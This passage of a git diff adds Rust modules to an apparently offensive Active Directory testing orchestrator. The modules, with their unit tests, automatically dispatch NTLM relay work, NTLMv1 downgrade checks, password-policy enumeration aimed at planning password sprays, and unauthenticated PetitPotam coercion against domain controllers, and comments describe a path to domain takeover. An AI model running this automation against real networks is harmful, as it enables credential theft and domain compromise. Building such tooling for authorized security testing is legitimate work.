serde_json::Value::String("192.168.58.40".to_string()), + ); + s.discovered_vulnerabilities.insert( + "v_unrelated".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "v_unrelated".into(), + vuln_type: "mssql_impersonation".into(), + target: "192.168.58.40".into(), + discovered_by: "scanner".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 3, + }, + ); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!( + work.is_empty(), + "unrelated vuln types should not produce work" + ); + } + + #[tokio::test] + async fn collect_relay_work_esc8_already_processed() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities.insert( + "v2".into(), + make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + s.mark_processed(DEDUP_SET, "esc8_relay:192.168.58.30".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "already-processed esc8 should be skipped"); + } + + #[tokio::test] + async fn collect_relay_work_mixed_exploited_and_fresh() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.discovered_vulnerabilities + .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23")); + // Only v1 is exploited + s.exploited_vulnerabilities.insert("v1".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].relay_target, "192.168.58.23"); + } + + #[tokio::test] + async fn collect_relay_work_coercion_source_prefers_uncoerced_dc() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Mark first DC as already coerced + s.mark_processed(DEDUP_COERCED_DCS, "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!( + work[0].coercion_source, + Some("192.168.58.20".into()), + "should prefer the uncoerced DC" + ); + } +} diff --git a/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs new file mode 100644 index 00000000..a89c9a77 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs @@ -0,0 +1,382 @@ +//! auto_ntlmv1_downgrade -- detect DCs allowing NTLMv1 authentication. +//! +//! When a DC accepts NTLMv1 (LmCompatibilityLevel < 3), attackers can +//! downgrade auth to capture NTLMv1 hashes via Responder/MITM, which are +//! trivially crackable. This module dispatches a check per DC. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect NTLMv1 downgrade work items from state (pure logic, no async). +fn collect_ntlmv1_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("ntlmv1:{}", dc_ip); + if state.is_processed(DEDUP_NTLMV1_DOWNGRADE, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(NtlmV1Work { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks each DC for NTLMv1 downgrade vulnerability. +/// Interval: 45s. +pub async fn auto_ntlmv1_downgrade( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ntlmv1_downgrade") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_ntlmv1_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "ntlmv1_downgrade_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("ntlmv1_downgrade"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "NTLMv1 downgrade check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_NTLMV1_DOWNGRADE, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_NTLMV1_DOWNGRADE, &item.dedup_key) + .await; + + // Register ntlmv1_downgrade vulnerability proactively so it + // appears in reports without waiting for the agent's + // report_finding callback (which only logs). + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("ntlmv1_{}", item.dc_ip.replace('.', "_")), + vuln_type: "ntlmv1_downgrade".to_string(), + target: item.dc_ip.clone(), + discovered_by: "auto_ntlmv1_downgrade".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.dc_ip)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert( + "description".to_string(), + json!("DC allows NTLMv1 authentication (LmCompatibilityLevel < 3). NTLMv1 hashes are trivially crackable."), + ); + d + }, + recommended_agent: "credential_access".to_string(), + priority: dispatcher.effective_priority("ntlmv1_downgrade"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + domain = %item.domain, + dc = %item.dc_ip, + "NTLMv1 downgrade — vulnerability registered" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to publish NTLMv1 downgrade vulnerability"); + } + } + } + Ok(None) => { + debug!(domain = %item.domain, "NTLMv1 downgrade check deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch NTLMv1 downgrade check"); + } + } + } + } +} + +struct NtlmV1Work { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("ntlmv1:{}", "192.168.58.10"); + assert_eq!(key, "ntlmv1:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1_downgrade"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ntlmv1_downgrade_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlmv1_downgrade_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = NtlmV1Work { + dedup_key: "ntlmv1:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_uses_dc_ip() { + // NTLMv1 dedup is by DC IP, not domain + let key = format!("ntlmv1:{}", "192.168.58.10"); + assert!(key.starts_with("ntlmv1:")); + assert!(key.contains("192.168.58.10")); + } + + // --- collect_ntlmv1_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "ntlmv1:192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1:192.168.58.10".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_dcs_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_key_uses_ip_not_domain() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dedup_key.starts_with("ntlmv1:")); + assert!(work[0].dedup_key.contains("192.168.58.10")); + assert!(!work[0].dedup_key.contains("contoso")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("ntlmv1:{}", "192.168.58.10"); + let key2 = format!("ntlmv1:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/password_policy.rs b/ares-cli/src/orchestrator/automation/password_policy.rs new file mode 100644 index 00000000..9ae27ca8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/password_policy.rs @@ -0,0 +1,380 @@ +//! auto_password_policy -- enumerate password policy per domain. +//! +//! Password policies reveal lockout thresholds, complexity requirements, and +//! minimum lengths. This information is critical for planning password spray +//! attacks without triggering lockouts. +//! +//! Dispatches `password_policy` recon tasks per discovered domain+DC pair. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_password_policy_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("policy:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_PASSWORD_POLICY, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(PasswordPolicyWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Enumerates password policy on each domain controller. +/// Interval: 30s. +pub async fn auto_password_policy( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("password_policy") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_password_policy_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "password_policy", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("password_policy"); + match dispatcher + .throttled_submit("recon", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Password policy enumeration dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PASSWORD_POLICY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_POLICY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Password policy task deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch password policy enum"); + } + } + } + } +} + +struct PasswordPolicyWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("policy:{}", "contoso.local"); + assert_eq!(key, "policy:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PASSWORD_POLICY, "password_policy"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "password_policy", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "password_policy"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = PasswordPolicyWork { + dedup_key: "policy:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "policy:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("policy:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "policy:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("policy:{}", "contoso.local"); + let key2 = format!("policy:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "policy:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_domains_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into()); + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam credential available + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "policy:contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs new file mode 100644 index 00000000..e67ce2e8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs @@ -0,0 +1,323 @@ +//! auto_petitpotam_unauth -- attempt unauthenticated PetitPotam (MS-EFSRPC) +//! coercion against DCs. +//! +//! On unpatched systems, EfsRpcOpenFileRaw allows unauthenticated NTLM coercion. +//! This was patched in August 2021 (KB5005413) but many environments still have +//! it open. The check requires no credentials — only a listener IP and DC target. +//! +//! If successful, the captured DC machine account NTLM auth can be relayed to +//! LDAP or ADCS for domain takeover. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect PetitPotam unauth work items from current state. +/// +/// Pure logic extracted from `auto_petitpotam_unauth` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_petitpotam_unauth_work(state: &StateInner, listener: &str) -> Vec { + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| dc_ip.as_str() != listener) + .filter(|(_, dc_ip)| { + let dedup_key = format!("petitpotam_unauth:{dc_ip}"); + !state.is_processed(DEDUP_PETITPOTAM_UNAUTH, &dedup_key) + }) + .map(|(domain, dc_ip)| PetitPotamWork { + dedup_key: format!("petitpotam_unauth:{dc_ip}"), + domain: domain.clone(), + dc_ip: dc_ip.clone(), + listener: listener.to_string(), + }) + .collect() +} + +/// Attempts unauthenticated PetitPotam against each DC once. +/// Interval: 45s. +pub async fn auto_petitpotam_unauth( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("petitpotam_unauth") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_petitpotam_unauth_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": item.dc_ip, + "domain": item.domain, + "listener_ip": item.listener, + }); + + let priority = dispatcher.effective_priority("petitpotam_unauth"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Unauthenticated PetitPotam coercion dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PETITPOTAM_UNAUTH, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PETITPOTAM_UNAUTH, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "PetitPotam unauth deferred"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch PetitPotam unauth"); + } + } + } + } +} + +struct PetitPotamWork { + dedup_key: String, + domain: String, + dc_ip: String, + listener: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + #[test] + fn dedup_key_format() { + let key = format!("petitpotam_unauth:{}", "192.168.58.10"); + assert_eq!(key, "petitpotam_unauth:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PETITPOTAM_UNAUTH, "petitpotam_unauth"); + } + + #[test] + fn skips_self_listener() { + let dc_ip = "192.168.58.50"; + let listener = "192.168.58.50"; + assert_eq!(dc_ip, listener); + } + + #[test] + fn no_cred_required() { + // PetitPotam unauth works without credentials + let _payload = serde_json::json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": "192.168.58.10", + "listener_ip": "192.168.58.50", + }); + // No credential field needed + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = serde_json::json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + }); + assert_eq!(payload["technique"], "petitpotam_unauthenticated"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert!(payload.get("credential").is_none()); + } + + #[test] + fn work_struct_construction() { + let work = PetitPotamWork { + dedup_key: "petitpotam_unauth:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + listener: "192.168.58.50".into(), + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.listener, "192.168.58.50"); + } + + #[test] + fn dedup_key_based_on_dc_ip() { + let dc_ip = "192.168.58.10"; + let key = format!("petitpotam_unauth:{dc_ip}"); + assert_eq!(key, "petitpotam_unauth:192.168.58.10"); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("petitpotam_unauth:{}", "192.168.58.10"); + let key2 = format!("petitpotam_unauth:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } + + #[test] + fn listener_excluded_from_targets() { + let dc_ip = "192.168.58.10"; + let listener = "192.168.58.50"; + assert_ne!(dc_ip, listener, "DC should not be the listener"); + + let self_target_dc = "192.168.58.50"; + assert_eq!(self_target_dc, listener, "Self-targeting should be skipped"); + } + + // --- collect_petitpotam_unauth_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_dcs_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "petitpotam_unauth:192.168.58.10"); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[test] + fn collect_no_credentials_still_produces_work() { + // PetitPotam unauth does NOT require credentials + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_skips_dc_matching_listener() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.50".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed( + DEDUP_PETITPOTAM_UNAUTH, + "petitpotam_unauth:192.168.58.10".into(), + ); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed( + DEDUP_PETITPOTAM_UNAUTH, + "petitpotam_unauth:192.168.58.10".into(), + ); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = 